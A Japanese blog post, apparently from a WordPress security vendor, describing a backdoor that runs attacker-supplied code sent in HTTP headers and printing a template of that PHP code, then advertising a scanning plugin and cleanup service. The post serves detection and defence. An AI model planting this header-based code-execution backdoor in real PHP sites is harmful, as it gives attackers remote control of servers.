昨今検出が非常に増えている$_HEADERS にマルウェアのコード本体を仕込むタイプのバックドアについて解説いたします


POSTやGETではなくHEADERでマルウェア本体のコードを送信するバックドア

このバックドアは、従来のPOSTやGETリクエストによってマルウェアを遠隔から感染させるのではなく、HEADERというHTMLのリクエストのヘッダ部分の情報に仕込まれているマルウェア本体をサーバーに感染させるという意味で、新しいタイプのバックドアかと存じますが現在非常に流行っております。

ワードプレスの脆弱性を利用されるか、管理者権限を奪われる事などにより、下記のようなコードのバックドアが、ワードプレス本体やプラグイン・テーマのフォルダに一般的な名称の単語ファイルで多数生成されます。

$_HEADERS = getallheaders();
if (isset($_HEADERS['ランダムな単語'])) {
    $ランダムな単語 = $_HEADERS['ランダムな単語']('', $_HEADERS['ランダムな単語']($_HEADERS['ランダムな単語']));
    $ランダムな単語();
}

ヘッダーの配列にランダムな名称のヘッダーデータを遠隔からCreateFunction(PHPで関数を作成する関数 evalと同様の機能を持ちます)で実行させるコードとなっていますが、POSTやGETリクエストを使用せず、かつランダムな名称のヘッダーデータを使用するようになっていますので、バックドアとして検出されるのが非常に困難なコードになっています。

検出と駆除

【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

にて、最新のマルウェア検出パターンを使用いただくとこのタイプのバックドアの検出と駆除が可能です。

お試しいただけましたら幸いです。

参考
無料でできるワードプレスのセキュリティー対策5選

またワードプレスドクターでマルウェアやバックドアの検査駆除を代行いたしております。ご自身でされるのが難しいと感じたらお気軽にご相談をお送りいただけましたら幸いです。

WordPress ワードプレスのマルウェア駆除・セキュリティー対策は専門家にお任せください。お気軽にご依頼・ご相談お送りくださいませ